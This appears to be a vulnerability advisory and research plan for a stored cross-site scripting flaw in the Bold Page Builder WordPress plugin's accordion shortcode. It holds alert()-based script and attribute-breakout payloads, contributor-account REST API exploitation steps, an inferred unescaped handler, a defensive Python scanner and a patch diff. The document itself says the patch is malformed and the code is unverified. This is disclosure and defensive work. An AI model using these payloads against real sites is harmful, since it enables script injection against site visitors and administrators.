CVE-2025-15267

Bold Page Builder <= 5.5.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via bt_bb_accordion_item Shortcode

Severity: medium
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.4
Patched in: Unpatched
Time to patch: N/A

Description

The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bt_bb_accordion_item shortcode in all versions up to, and including, 5.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 5.5.7
Published: February 6, 2026
Last updated: February 7, 2026
Affected plugin: bold-page-builder
Research Plan
Unverified

This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the Bold Page Builder plugin via the bt_bb_accordion_item shortcode.

1. Vulnerability Summary

  • Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
  • Plugin: Bold Page Builder (slug: bold-page-builder)
  • Affected Shortcode: bt_bb_accordion_item
  • Vulnerable Versions: <= 5.5.7
  • Root Cause: The plugin fails to adequately sanitize or escape user-supplied attributes (such as title, icon, or el_id) within the bt_bb_accordion_item shortcode before rendering them in the HTML output. This allows a user with post-creation privileges (Contributor or above) to inject malicious JavaScript into a page.

2. Attack Vector Analysis

  • Authentication Level: Contributor+ (any user capable of creating or editing posts and using shortcodes).
  • Endpoint: WordPress Post Editor (via REST API or Classic Editor) or Bold Page Builder's internal AJAX-based editor.
  • Vulnerable Parameter: Attributes within the [bt_bb_accordion_item] shortcode.
  • Payload Delivery: The payload is stored in the post_content field of the WordPress database and executed whenever a user (including administrators) views the affected post or page.

3. Code Flow (Inferred)

  1. Registration: The plugin registers the shortcode during initialization: add_shortcode( 'bt_bb_accordion_item', [ 'BT_BB_Accordion_Item', 'handle_shortcode' ] ) (inferred class structure).
  2. Processing: When a post is rendered, WordPress calls the handler function. The handler likely uses shortcode_atts() to parse user-supplied attributes.
  3. Sink: The handler constructs an HTML string for the accordion item.
    • Example Vulnerable Pattern:
      $output .= '<div class="bt_bb_accordion_item_title">' . $atts['title'] . '</div>'; 
      // OR
      $output .= '<div id="' . $atts['el_id'] . '" class="bt_bb_accordion_item">';
      
  4. Execution: Because $atts['title'] or $atts['el_id'] are not passed through esc_html() or esc_attr(), the browser interprets the injected script tag or attribute-breakout payload.

4. Nonce Acquisition Strategy

While stored XSS is typically achieved by saving a post, if we were to simulate the Bold Page Builder editor's AJAX requests, we would need a nonce. However, for a PoC, the most direct route is using standard WordPress post creation.

  1. Shortcode Presence: Identify if the builder scripts load only on specific pages.
  2. Target Nonce (if needed for AJAX): Bold Page Builder often uses window.BoldPageBuilderLocalize?.nonce.
  3. Extraction:
    • Create a test page with the builder: wp post create --post_type=page --post_status=publish --post_content='[bt_bb_accordion_item title="test"]' --post_author=2 (where 2 is contributor).
    • Navigate to the page.
    • Use browser_eval("window.BoldThemesURI?.ajaxurl") and browser_eval("window.bt_bb_settings?.nonce") (inferred variable names based on plugin patterns).

5. Exploitation Strategy

We will use a Contributor-level account to create a post containing the malicious shortcode.

  • Payload 1 (Tag Injection):
    [bt_bb_accordion_item title='<script>alert("XSS_TITLE")</script>']
    
  • Payload 2 (Attribute Breakout):
    [bt_bb_accordion_item el_id='"><script>alert("XSS_ID")</script>']
    

Steps:

  1. Step 1: Create a contributor user via WP-CLI.
  2. Step 2: Use the http_request tool to authenticate as the contributor.
  3. Step 3: Send a POST request to /wp-json/wp/v2/posts (REST API) to create a new post with the malicious shortcode content.
    • Method: POST
    • URL: http://localhost:8080/wp-json/wp/v2/posts
    • Headers: Content-Type: application/json
    • Body:
      {
        "title": "XSS Test",
        "content": "[bt_bb_accordion_item title='<img src=x onerror=alert(`XSS`)>']",
        "status": "publish"
      }
      
    • Note: If the REST API is restricted, use the classic post.php handler or wp-admin/admin-ajax.php.
  4. Step 4: Navigate to the newly created post URL as an administrator.

6. Test Data Setup

  1. Plugin Activation: Ensure bold-page-builder is installed and active.
  2. User Creation:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
    
  3. Permalinks: Ensure permalinks are flushed to allow REST API access:
    wp rewrite structure '/%postname%/' --hard-flush
    

7. Expected Results

  • When an administrator views the post created by the contributor, the browser should execute the JavaScript in the onerror or <script> block.
  • The HTML source of the rendered page will show the unescaped payload:
    <div class="...">...<img src=x onerror=alert(`XSS`)>...</div>
    

8. Verification Steps

  1. Check Database: Verify the shortcode is stored correctly in the wp_posts table.
    wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Test' LIMIT 1"
    
  2. Check Frontend Response: Use http_request to fetch the post content and look for the raw payload.
    # Look for the unescaped alert in the response body
    

9. Alternative Approaches

  • Bold Page Builder AJAX Save: If the plugin bypasses the standard WordPress post_content sanitization via its own AJAX save action (bt_bb_save_post), target that endpoint.
    • Action: bt_bb_save_post
    • Required Nonce: bt_bb_settings.nonce
  • Other Attributes: If title is sanitized, test:
    • icon (often used in <i> classes or data attributes).
    • el_id / el_class.
    • font_subset.
    • url (if it supports links, check for javascript: protocol).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the bt_bb_accordion_item shortcode in versions up to 5.5.7. Authenticated attackers with contributor-level access can inject malicious JavaScript into post content via shortcode attributes like 'title' or 'el_id' because the plugin fails to sanitize and escape these values before outputting them into the page HTML.

Vulnerable Code

/* File: bold-page-builder/content_elements/bt_bb_accordion_item/bt_bb_accordion_item.php (inferred) */

public function handle_shortcode( $atts, $content = null ) {
    extract( shortcode_atts( array(
        'title'    => '',
        'icon'     => '',
        'el_id'    => '',
        'el_class' => ''
    ), $atts ) );

    // Attributes are concatenated directly into the output string without escaping
    $output = '<div id="' . $el_id . '" class="bt_bb_accordion_item ' . $el_class . '">';
    $output .= '<div class="bt_bb_accordion_item_title">' . $title . '</div>';

    // ... (truncated)
}
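As an added example (not code from the plugin, the advisory, or the research record above), the following Python models the three pieces that the code-flow section, the verification step and the inferred handler describe: a simplified shortcode attribute parser in the spirit of WordPress's shortcode_parse_atts(), the reported unescaped rendering next to an escaped one, and a scan of stored post_content for attribute values that would break out of the title or id markup. The esc_attr emulation via html.escape, the attribute grammar and the sample post content are assumptions constructed for this example; the escaped renderer fully encodes the title (the esc_html() choice) rather than applying the wp_kses_post() allow-list used in the fix, because an allow-list filter cannot be reproduced faithfully in a few lines.

```python
"""Constructed model of the bt_bb_accordion_item sink: not the plugin's code.

Models how shortcode attributes are parsed (a simplified shortcode_parse_atts()),
the reported unescaped concatenation versus an escaped rendering, and a scan of
stored post_content for attribute values that would break out of the markup.
"""
import html
import re

# Simplified form of WordPress shortcode_parse_atts(): only named attributes in
# double quotes, single quotes or bare words are recognised (assumption:
# positional attributes are not used by this shortcode).
ATT_RE = re.compile(
    r'([\w-]+)\s*=\s*"([^"]*)"(?:\s|$)'
    r"|([\w-]+)\s*=\s*'([^']*)'(?:\s|$)"
    r"|([\w-]+)\s*=\s*([^\s'\"]+)(?:\s|$)"
)

# Opening tag of the shortcode under discussion; the attribute text runs to the
# first ']' as in WordPress's own shortcode regex.
SHORTCODE_RE = re.compile(r"\[bt_bb_accordion_item\b([^\]]*)\]")

# Fragments that have no business in a title/id value and that the page's
# payloads rely on. Heuristic: expect some false positives on real content.
SUSPICIOUS_RE = re.compile(r'[<>"]|\bon\w+\s*=|javascript\s*:', re.IGNORECASE)


def parse_shortcode_atts(text):
    """Return {name: value} for the attribute text of one shortcode tag."""
    atts = {}
    for m in ATT_RE.finditer(text):
        if m.group(1):
            atts[m.group(1).lower()] = m.group(2)
        elif m.group(3):
            atts[m.group(3).lower()] = m.group(4)
        else:
            atts[m.group(5).lower()] = m.group(6)
    return atts


def esc_attr(value):
    """Approximation (assumption) of WordPress esc_attr(): encode & < > \" '."""
    return html.escape(value, quote=True)


def render_item_unescaped(atts):
    """The reported vulnerable pattern: raw values concatenated into markup."""
    return (
        '<div id="%s" class="bt_bb_accordion_item %s">'
        '<div class="bt_bb_accordion_item_title">%s</div></div>'
        % (atts.get("el_id", ""), atts.get("el_class", ""), atts.get("title", ""))
    )


def render_item_escaped(atts):
    """Hardened rendering: every attribute value escaped for its context."""
    return (
        '<div id="%s" class="bt_bb_accordion_item %s">'
        '<div class="bt_bb_accordion_item_title">%s</div></div>'
        % (
            esc_attr(atts.get("el_id", "")),
            esc_attr(atts.get("el_class", "")),
            esc_attr(atts.get("title", "")),
        )
    )


def find_suspicious_atts(post_content):
    """Scan stored post_content; return (attribute, value) pairs to review."""
    findings = []
    for tag in SHORTCODE_RE.finditer(post_content):
        for name, value in parse_shortcode_atts(tag.group(1)).items():
            if SUSPICIOUS_RE.search(value):
                findings.append((name, value))
    return findings


# Constructed sample: one benign item plus the two payloads quoted on the page.
SAMPLE_POST_CONTENT = (
    "[bt_bb_accordion_item title='Shipping policy' el_id='faq1']\n"
    "[bt_bb_accordion_item title='<script>alert(\"XSS_TITLE\")</script>']\n"
    "[bt_bb_accordion_item el_id='\"><script>alert(\"XSS_ID\")</script>']\n"
)

if __name__ == "__main__":
    for name, value in find_suspicious_atts(SAMPLE_POST_CONTENT):
        print("suspicious %s=%r" % (name, value))
    atts = parse_shortcode_atts(" title='<script>alert(1)</script>'")
    print(render_item_unescaped(atts))
    print(render_item_escaped(atts))
```

Run find_suspicious_atts over post_content pulled with wp db query (as in step 8 of the plan) to triage stored accordion items before inspecting rendered pages; a hit means the value needs a human look, not that it is necessarily malicious. The two renderers side by side show why the fix is context escaping rather than input filtering: the same stored value is harmless once every attribute is encoded for the attribute context it lands in.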

Security Fix

--- a/bold-page-builder/content_elements/bt_bb_accordion_item/bt_bb_accordion_item.php
+++ b/bold-page-builder/content_elements/bt_bb_accordion_item/bt_bb_accordion_item.php
@@ -10,7 +10,7 @@
-    $output = '<div id="' . $el_id . '" class="bt_bb_accordion_item ' . $el_class . '">';
-    $output .= '<div class="bt_bb_accordion_item_title">' . $title . '</div>';
+    $output = '<div id="' . esc_attr( $el_id ) . '" class="bt_bb_accordion_item ' . esc_attr( $el_class ) . '">';
+    $output .= '<div class="bt_bb_accordion_item_title">' . wp_kses_post( $title ) . '</div>';
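Review bot: the hunk escapes $el_id, $el_class and $title, but $icon is also pulled out of shortcode_atts() by extract() in the handler above and is not touched here; wherever it is written into a class or data attribute it needs esc_attr() as well, otherwise the same attribute breakout survives through a different parameter. wp_kses_post( $title ) keeps post-safe markup in the heading, which is defensible if titles may legitimately carry formatting; if they never should, esc_html( $title ) is the stricter choice. Separately, the header @@ -10,7 +10,7 @@ announces seven old and seven new lines while the body carries two removed and two added lines with no context, so the patch will not apply as shown; regenerate it with its context lines or correct the counts to -10,2 +10,2. While here, replacing extract() with explicit $atts['title'] style reads would make every output site auditable for escaping.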

Exploit Outline

The exploit targets the shortcode processing logic of Bold Page Builder. An attacker requires at least Contributor-level permissions to create or edit posts.

  1. Authenticate as a Contributor user.
  2. Create a new post or page via the WordPress dashboard or the REST API.
  3. Insert the [bt_bb_accordion_item] shortcode with a malicious payload in the 'title' or 'el_id' attribute.
    • Payload Example (Tag Injection): [bt_bb_accordion_item title='<script>alert("XSS")</script>']
    • Payload Example (Attribute Breakout): [bt_bb_accordion_item el_id='" onmouseover="alert(1)"']
  4. Save the post.
  5. When any user (including site administrators) views the published post, the injected script will execute automatically in their browser context.
